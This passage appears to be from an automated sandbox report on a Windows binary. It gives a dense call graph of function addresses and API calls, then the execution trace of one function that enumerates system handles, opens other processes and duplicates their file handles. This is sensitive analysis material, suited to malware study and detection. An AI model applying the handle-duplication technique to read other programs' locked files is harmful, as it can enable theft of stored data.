415a7e memset 39490->39492 39491->39384 39492->39491 39494 4438b5 11 API calls 39493->39494 39495 41525d 39494->39495 39495->39390 39497 444328 39496->39497 39498 444423 39497->39498 39499 44434e 39497->39499 39500 4446ea 11 API calls 39498->39500 39501 432d4e memset memset memcpy 39499->39501 39507 444381 39500->39507 39502 44435a 39501->39502 39504 444375 39502->39504 39509 44438b 39502->39509 39503 432d4e memset memset memcpy 39505 4443ec 39503->39505 39506 416935 16 API calls 39504->39506 39505->39507 39508 416935 16 API calls 39505->39508 39506->39507 39507->39396 39508->39507 39509->39503 39511 432d58 39510->39511 39513 432d65 39510->39513 39512 432cc4 memset memset memcpy 39511->39512 39512->39513 39531 41693e 39530->39531 39534 41698e 39530->39534 39532 41694c 39531->39532 39533 422fd1 memset 39531->39533 39532->39534 39535 4165a0 11 API calls 39532->39535 39533->39532 39534->39424 39536 416972 39535->39536 39536->39534 39537 422b84 15 API calls 39536->39537 39537->39534 39543->39385 39545 41703f 11 API calls 39544->39545 39546 43847a 39545->39546 39547 43848a 39546->39547 39548 43847e 39546->39548 39550 438270 133 API calls 39547->39550 39549 4446ea 11 API calls 39548->39549 39552 438488 39549->39552 39551 4384aa 39550->39551 39551->39552 39553 424f26 122 API calls 39551->39553 39552->39427 39554 4384bb 39553->39554 39555 438270 133 API calls 39554->39555 39555->39552 39557 424f1f 39556->39557 39558 424f0c 39556->39558 39560 424eea 11 API calls 39557->39560 39559 416760 11 API calls 39558->39559 39561 424f18 39559->39561 39562 424f24 39560->39562 39561->39430 39562->39430 39563->39434 39565 425108 39564->39565 39571 42510d 39564->39571 39566 424f74 123 API calls 39565->39566 39566->39571 39567 42569b 124 API calls 39568 42516e 39567->39568 39570 415c7d 16 API calls 39568->39570 39569 425115 39569->39436 39570->39569 39571->39567 39571->39569 39572->39436 39573->39436 39576->39434 39577->39457 39578->39473 39610 413f4f 39583->39610 39586 413f37 K32GetModuleFileNameExW 39587 413f4a 39586->39587 39587->38708 39589 41396c wcschr 39588->39589 39591 413969 wcscpy 39588->39591 39589->39591 39592 41398e 39589->39592 39593 413a3a 39591->39593 39615 4097f7 wcslen wcslen _memicmp 39592->39615 39593->38708 39595 41399a 39596 4139a4 memset 39595->39596 39597 4139e6 39595->39597 39616 409dd5 GetWindowsDirectoryW wcscpy 39596->39616 39599 413a31 wcscpy 39597->39599 39600 4139ec memset 39597->39600 39599->39593 39617 409dd5 GetWindowsDirectoryW wcscpy 39600->39617 39601 4139c9 wcscpy wcscat 39601->39593 39603 413a11 memcpy wcscat 39603->39593 39605 413cb0 GetModuleHandleW 39604->39605 39606 413cda 39604->39606 39605->39606 39607 413cbf GetProcAddress 39605->39607 39608 413ce3 GetProcessTimes 39606->39608 39609 413cf6 39606->39609 39607->39606 39608->38710 39609->38710 39611 413f2f 39610->39611 39612 413f54 39610->39612 39611->39586 39611->39587 39613 40a804 8 API calls 39612->39613 39614 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39613->39614 39614->39611 39615->39595 39616->39601 39617->39603 39618->38731 39619->38753 39621 409cf9 GetVersionExW 39620->39621 39622 409d0a 39620->39622 39621->39622 39622->38760 39622->38763 39623->38767 39624->38769 39625->38835 39627 40bba5 39626->39627 39674 40cc26 39627->39674 39630 40bd4b 39695 40cc0c 39630->39695 39635 40b2cc 27 API calls 39636 40bbef 39635->39636 39702 40ccf0 _wcsicmp 39636->39702 39638 40bbf5 39638->39630 39703 40ccb4 6 API calls 39638->39703 39640 40bc26 39641 40cf04 17 API calls 39640->39641 39642 40bc2e 39641->39642 39643 40bd43 39642->39643 39644 40b2cc 27 API calls 39642->39644 39645 40cc0c 4 API calls 39643->39645 39646 40bc40 39644->39646 39645->39630 39704 40ccf0 _wcsicmp 39646->39704 39648 40bc46 39648->39643 39649 40bc61 memset memset WideCharToMultiByte 39648->39649 39705 40103c strlen 39649->39705 39651 40bcc0 39652 40b273 27 API calls 39651->39652 39653 40bcd0 memcmp 39652->39653 39653->39643 39654 40bce2 39653->39654 39655 404423 37 API calls 39654->39655 39656 40bd10 39655->39656 39656->39643 39657 40bd3a LocalFree 39656->39657 39658 40bd1f memcpy 39656->39658 39657->39643 39658->39657 39659->38850 39661 409a74 GetTempFileNameW 39660->39661 39662 409a66 GetWindowsDirectoryW 39660->39662 39661->38848 39662->39661 39663->38885 39664->38885 39665->38885 39666->38885 39667->38885 39668->38885 39669->38885 39670->38885 39671->38885 39672->38860 39673->38882 39706 4096c3 CreateFileW 39674->39706 39676 40cc34 39677 40cc3d GetFileSize 39676->39677 39678 40bbca 39676->39678 39679 40afcf 2 API calls 39677->39679 39678->39630 39686 40cf04 39678->39686 39680 40cc64 39679->39680 39707 40a2ef ReadFile 39680->39707 39682 40cc71 39708 40ab4a MultiByteToWideChar 39682->39708 39684 40cc95 CloseHandle 39685 40b04b ??3@YAXPAX 39684->39685 39685->39678 39687 40b633 free 39686->39687 39688 40cf14 39687->39688 39714 40b1ab free free 39688->39714 39690 40bbdd 39690->39630 39690->39635 39691 40cf1b 39691->39690 39693 40cfef 39691->39693 39715 40cd4b 39691->39715 39694 40cd4b 14 API calls 39693->39694 39694->39690 39696 40b633 free 39695->39696 39697 40cc15 39696->39697 39698 40aa04 free 39697->39698 39699 40cc1d 39698->39699 39764 40b1ab free free 39699->39764 39701 40b7d4 memset CreateFileW 39701->38841 39701->38842 39702->39638 39703->39640 39704->39648 39705->39651 39706->39676 39707->39682 39709 40ab6b 39708->39709 39713 40ab93 39708->39713 39710 40a9ce 4 API calls 39709->39710 39711 40ab74 39710->39711 39712 40ab7c MultiByteToWideChar 39711->39712 39712->39713 39713->39684 39714->39691 39716 40cd7b 39715->39716 39749 40aa29 39716->39749 39718 40cef5 39719 40aa04 free 39718->39719 39720 40cefd 39719->39720 39720->39691 39722 40aa29 6 API calls 39723 40ce1d 39722->39723 39724 40aa29 6 API calls 39723->39724 39725 40ce3e 39724->39725 39726 40ce6a 39725->39726 39757 40abb7 wcslen memmove 39725->39757 39727 40ce9f 39726->39727 39760 40abb7 wcslen memmove 39726->39760 39730 40a8d0 7 API calls 39727->39730 39733 40ceb5 39730->39733 39731 40ce56 39758 40aa71 wcslen 39731->39758 39732 40ce8b 39761 40aa71 wcslen 39732->39761 39739 40a8d0 7 API calls 39733->39739 39736 40ce5e 39759 40abb7 wcslen memmove 39736->39759 39737 40ce93 39762 40abb7 wcslen memmove 39737->39762 39741 40cecb 39739->39741 39763 40d00b malloc memcpy free free 39741->39763 39743 40cedd 39744 40aa04 free 39743->39744 39745 40cee5 39744->39745 39746 40aa04 free 39745->39746 39747 40ceed 39746->39747 39748 40aa04 free 39747->39748 39748->39718 39750 40aa33 39749->39750 39756 40aa63 39749->39756 39751 40aa44 39750->39751 39752 40aa38 wcslen 39750->39752 39753 40a9ce malloc memcpy free free 39751->39753 39752->39751 39754 40aa4d 39753->39754 39755 40aa51 memcpy 39754->39755 39754->39756 39755->39756 39756->39718 39756->39722 39757->39731 39758->39736 39759->39726 39760->39732 39761->39737 39762->39727 39763->39743 39764->39701 39765->38900 39766->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 37851 415304 free 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 4418e2 39785->39786 39788 442bd4 39785->39788 39787 4418ea 39786->39787 39965 4414a9 12 API calls 39786->39965 39788->39787 39966 441409 memset 39788->39966 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39810 43acd5 39807->39810 39982 4233ae 11 API calls 39807->39982 39983 423426 11 API calls 39810->39983 39811 43ac87 39981 4233c5 16 API calls 39811->39981 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39822 43ad58 39987 44081d 162 API calls 39822->39987 39824->39822 39828 43add9 39824->39828 39827 43ae3a memset 39829 43ae73 39827->39829 39828->39828 39991 423426 11 API calls 39828->39991 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39833 43ad6c 39833->39793 39833->39830 39988 42370b memset memcpy memset 39833->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b3f6 39846->39852 39854 43b4c8 39846->39854 39848 43b60f 39848->39793 40055 4393a5 17 API calls 39848->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 40037 432878 12 API calls 39852->40037 39853 43af51 39998 423426 11 API calls 39853->39998 39856 43b4f2 39854->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39854->40043 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39875 43afdb 40002 4233ae 11 API calls 39875->40002 39881 43b56c 39884 43b58a 39881->39884 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39883 43afee 40003 44081d 162 API calls 39883->40003 40049 440f84 12 API calls 39884->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39904 43b087 40005 4233ae 11 API calls 39904->40005 39905 43add4 39905->39848 40054 438f86 16 API calls 39905->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39934 43b2b8 39932->39934 39935 43b2ce 39932->39935 40022 4233ae 11 API calls 39934->40022 40023 440f84 12 API calls 39935->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39788 39968 43a6f5 39967->39968 39969 43a765 39967->39969 39968->39969 40056 42a115 39968->40056 39969->39793 39976 4397fd memset 39969->39976 39973 43a73d 39973->39969 39974 42a115 146 API calls 39973->39974 39974->39969 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39811 39981->39807 39982->39810 39983->39815 39984->39819 39985->39821 39986->39824 39987->39833 39988->39830 39989->39835 39990->39905 39991->39827 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39853 39998->39858 39999->39864 40000->39868 40001->39875 40002->39883 40003->39898 40004->39904 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39905 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39884 40049->39891 40050->39886 40051->39894 40052->39896 40053->39905 40054->39848 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39969 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39973 40077 43a196 40063->40077 40078 43a19e 40063->40078 40064 43a306 40064->40077 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40077 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40077->40059 40078->40064 40078->40067 40078->40077 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 42bf4c 14 API calls 40082 43a325 40080->40082 40081 4169a7 11 API calls 40081->40082 40082->40069 40082->40073 40082->40077 40082->40080 40082->40081 40083 42b5b5 memset memcpy 40082->40083 40086 4165ff 11 API calls 40082->40086 40108 42b63e 14 API calls 40082->40108 40109 42bfcf memcpy 40082->40109 40083->40082 40086->40082 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40082 40108->40082 40109->40082 40110->40069 40111->40077 40113 438187 40112->40113 40115 438192 40112->40115 40118 4380f6 40113->40118 40115->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 438164 40119->40115 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40136 43802b 40130->40136 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40136->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40178 4373ac 40175->40178 40256 4446ea 11 API calls 40176->40256 40179 416935 16 API calls 40178->40179 40180 4373ca 40179->40180 40182 438460 133 API calls 40180->40182 40186 4251c4 136 API calls 40180->40186 40190 415a91 memset 40180->40190 40193 43758f 40180->40193 40205 437584 40180->40205 40208 437d3c 134 API calls 40180->40208 40257 425433 13 API calls 40180->40257 40258 425413 17 API calls 40180->40258 40259 42533e 16 API calls 40180->40259 40260 42538f 16 API calls 40180->40260 40261 42453e 122 API calls 40180->40261 40181 4375bc 40264 415c7d 16 API calls 40181->40264 40182->40180 40185 4375d2 40207 4373a7 40185->40207 40265 4442e6 11 API calls 40185->40265 40186->40180 40188 4375e2 40188->40207 40266 444283 13 API calls 40188->40266 40190->40180 40262 42453e 122 API calls 40193->40262 40194 4375f4 40199 437620 40194->40199 40200 43760b 40194->40200 40198 43759f 40201 416935 16 API calls 40198->40201 40203 416935 16 API calls 40199->40203 40267 444283 13 API calls 40200->40267 40201->40205 40203->40207 40205->40181 40263 42453e 122 API calls 40205->40263 40206 437612 memcpy 40206->40207 40207->40141 40208->40180 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40240 41ee6b 85 API calls 40238->40240 40241 41f2e0 40239->40241 40240->40229 40243 41b1ca memset 40241->40243 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 40254->40250 40255->40175 40256->40207 40257->40180 40258->40180 40259->40180 40260->40180 40261->40180 40262->40198 40263->40181 40264->40185 40265->40188 40266->40194 40267->40206 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40310 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39767 4147f3 39770 414561 39767->39770 39769 414813 39771 41456d 39770->39771 39772 41457f GetPrivateProfileIntW 39770->39772 39775 4143f1 memset _itow WritePrivateProfileStringW 39771->39775 39772->39769 39774 41457a 39774->39769 39775->39774

                                                                    Executed Functions

                                                                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
